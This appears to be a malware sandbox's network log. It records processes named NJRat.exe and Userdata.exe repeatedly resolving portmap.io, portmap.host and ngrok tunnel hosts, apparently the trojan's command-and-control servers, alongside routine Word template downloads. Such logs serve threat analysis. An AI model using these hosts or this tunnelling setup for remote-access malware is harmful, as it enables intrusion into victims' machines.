startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

NJRat.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

NJRat.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

NJRat.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

NJRat.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

NJRat.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

NJRat.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

0.tcp.ngrok.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

0.tcp.ngrok.io

IN A

Response

0.tcp.ngrok.io

IN A

3.137.60.53
DNS

0.tcp.ngrok.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

0.tcp.ngrok.io

IN A
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

NJRat.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

NJRat.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

self.events.data.microsoft.com

Userdata.exe

Remote address:

8.8.8.8:53

Request

self.events.data.microsoft.com

IN A

Response

self.events.data.microsoft.com

IN CNAME

self-events-data.trafficmanager.net

self-events-data.trafficmanager.net

IN CNAME

onedscolprdeus13.eastus.cloudapp.azure.com

onedscolprdeus13.eastus.cloudapp.azure.com

IN A

52.168.117.170
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

NJRat.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

NJRat.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

NJRat.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

NJRat.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

0.tcp.ngrok.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

0.tcp.ngrok.io

IN A

Response

0.tcp.ngrok.io

IN A

18.190.63.84
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

self.events.data.microsoft.com

NJRat.exe

Remote address:

8.8.8.8:53

Request

self.events.data.microsoft.com

IN A

Response

self.events.data.microsoft.com

IN CNAME

self-events-data.trafficmanager.net

self-events-data.trafficmanager.net

IN CNAME

onedscolprdcus07.centralus.cloudapp.azure.com

onedscolprdcus07.centralus.cloudapp.azure.com

IN A

52.182.143.209
DNS

ocsp.digicert.com

NJRat.exe

Remote address:

8.8.8.8:53

Request

ocsp.digicert.com

IN A

Response

ocsp.digicert.com

IN CNAME

ocsp.edge.digicert.com

ocsp.edge.digicert.com

IN CNAME

cac-ocsp.digicert.com.edgekey.net

cac-ocsp.digicert.com.edgekey.net

IN CNAME

e3913.cd.akamaiedge.net

e3913.cd.akamaiedge.net

IN A

104.78.173.167
DNS

ocsp.digicert.com

NJRat.exe

Remote address:

8.8.8.8:53

Request

ocsp.digicert.com

IN A

Response

ocsp.digicert.com

IN CNAME

ocsp.edge.digicert.com

ocsp.edge.digicert.com

IN CNAME

cac-ocsp.digicert.com.edgekey.net

cac-ocsp.digicert.com.edgekey.net

IN CNAME

e3913.cd.akamaiedge.net

e3913.cd.akamaiedge.net

IN A

104.78.173.167
GET

https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C

WINWORD.EXE

Remote address:

92.122.54.81:443

Request

GET /client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 55F157D6-23D5-4828-A337-A9C08C3CB03E
Host: metadata.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Type: text/xml
Server: Kestrel
Content-Encoding: gzip
Content-Length: 1265
Cache-Control: max-age=125372
Date: Wed, 12 Mar 2025 02:41:48 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cab

WINWORD.EXE

Remote address:

2.19.252.136:443

Request

GET /support/templates/en-us/tp02851219.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 55F157D6-23D5-4828-A337-A9C08C3CB03E
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31605
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: ae2zv4HJn+ipS7oDQIxa4Q==
Last-Modified: Fri, 22 Apr 2016 16:09:39 GMT
ETag: 0x8D36AC8822FFB6E
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d1eac4bf-d01e-0092-5897-a00efc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 12 Mar 2025 02:41:48 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab

WINWORD.EXE

Remote address:

2.19.252.136:443

Request

GET /support/templates/en-us/tp02851216.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 55F157D6-23D5-4828-A337-A9C08C3CB03E
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 34816
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: YoYxJM3NoTXswOcieCy4iA==
Last-Modified: Fri, 22 Apr 2016 16:09:38 GMT
ETag: 0x8D36AC8813CE0D3
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d620fdce-d01e-0011-5bcc-7d1af1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 12 Mar 2025 02:41:48 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab

WINWORD.EXE

Remote address:

2.19.252.136:443

Request

GET /support/templates/en-us/tp02835233.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 55F157D6-23D5-4828-A337-A9C08C3CB03E
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 46413
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: xFXEvEvsng2mfE0eU+RtWg==
Last-Modified: Fri, 22 Apr 2016 16:09:25 GMT
ETag: 0x8D36AC879BBB45C
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: bcca83ea-301e-000c-1015-b91d22000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 12 Mar 2025 02:41:48 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab

WINWORD.EXE

Remote address:

2.19.252.136:443

Request

GET /support/templates/en-us/tp02851217.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 55F157D6-23D5-4828-A337-A9C08C3CB03E
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 33610
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: UYBOJVxXMXYDn01bVcEqsg==
Last-Modified: Fri, 22 Apr 2016 16:09:38 GMT
ETag: 0x8D36AC881987151
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0171b447-f01e-005b-359a-1db97e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 12 Mar 2025 02:41:48 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cab

WINWORD.EXE

Remote address:

2.19.252.136:443

Request

GET /support/templates/en-us/tp02851218.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 55F157D6-23D5-4828-A337-A9C08C3CB03E
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31835
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: kqgZ1DSoquosZfDMLzO7Og==
Last-Modified: Fri, 22 Apr 2016 16:09:39 GMT
ETag: 0x8D36AC881E66CE5
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7ac92116-501e-008c-3524-b9e224000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 12 Mar 2025 02:41:48 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab

WINWORD.EXE

Remote address:

2.19.252.136:443

Request

GET /support/templates/en-us/tp02851220.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 55F157D6-23D5-4828-A337-A9C08C3CB03E
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31482
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 8Q35ApgPHVvuqWssZoQIpw==
Last-Modified: Fri, 22 Apr 2016 16:09:40 GMT
ETag: 0x8D36AC8827914A7
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6af291c5-801e-0036-306e-a9075a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 12 Mar 2025 02:41:48 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab

WINWORD.EXE

Remote address:

2.19.252.136:443

Request

GET /support/templates/en-us/tp02851221.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 55F157D6-23D5-4828-A337-A9C08C3CB03E
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31562
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: HW+Oc6BmKkjTMgkKTIyJjw==
Last-Modified: Fri, 22 Apr 2016 16:09:40 GMT
ETag: 0x8D36AC882C4ED43
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e4f000bb-501e-0148-0297-a06910000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 12 Mar 2025 02:41:48 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab

WINWORD.EXE

Remote address:

2.19.252.136:443

Request

GET /support/templates/en-us/tp02851222.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 55F157D6-23D5-4828-A337-A9C08C3CB03E
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 28911
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: bXh7HiI9trkbaSOAYsyocg==
Last-Modified: Fri, 22 Apr 2016 16:09:41 GMT
ETag: 0x8D36AC8830E54C8
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2bee5db1-501e-00ee-2682-b92003000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 12 Mar 2025 02:41:48 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab

WINWORD.EXE

Remote address:

2.19.252.136:443

Request

GET /support/templates/en-us/tp02851223.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 55F157D6-23D5-4828-A337-A9C08C3CB03E
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 32833
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: IFr1FgTvlu8ejmAhJUH3Qg==
Last-Modified: Fri, 22 Apr 2016 16:09:41 GMT
ETag: 0x8D36AC88357BC32
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1e858e71-b01e-0028-5118-2de1ed000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 12 Mar 2025 02:41:48 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab

WINWORD.EXE

Remote address:

2.19.252.136:443

Request

GET /support/templates/en-us/tp02851225.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 55F157D6-23D5-4828-A337-A9C08C3CB03E
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31008
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 4DPMvHunh6L4JM4JUuV9RA==
Last-Modified: Fri, 22 Apr 2016 16:09:42 GMT
ETag: 0x8D36AC883F49D7D
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b3f59ba9-f01e-00aa-4597-a0aa3c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 12 Mar 2025 02:41:48 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab

WINWORD.EXE

Remote address:

2.19.252.136:443

Request

GET /support/templates/en-us/tp02851226.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 55F157D6-23D5-4828-A337-A9C08C3CB03E
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 35519
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: U+6dpJ0LhDVwOOzzdoONLg==
Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
ETag: 0x8D36AC88440C433
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 19a4e9a0-101e-0104-7797-a0f920000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 12 Mar 2025 02:41:48 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab

WINWORD.EXE

Remote address:

2.19.252.136:443

Request

GET /support/templates/en-us/tp02851224.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 55F157D6-23D5-4828-A337-A9C08C3CB03E
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 30957
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 08kDbk4RWegysbTS6dQr8A==
Last-Modified: Fri, 22 Apr 2016 16:09:42 GMT
ETag: 0x8D36AC883A171B7
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7a3535a8-301e-0103-55f4-b69543000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 12 Mar 2025 02:41:48 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab

WINWORD.EXE

Remote address:

2.19.252.136:443

Request

GET /support/templates/en-us/tp02851227.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 55F157D6-23D5-4828-A337-A9C08C3CB03E
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31471
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: karb7EFxz6gpK2GEkvXvNA==
Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
ETag: 0x8D36AC8848A0495
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c81084a1-301e-0023-0625-b910e9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 12 Mar 2025 02:41:48 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A
DNS

cxcs.microsoft.net

Remote address:

8.8.8.8:53

Request

cxcs.microsoft.net

IN A

Response

cxcs.microsoft.net

IN CNAME

cxcs.microsoft.net.edgekey.net

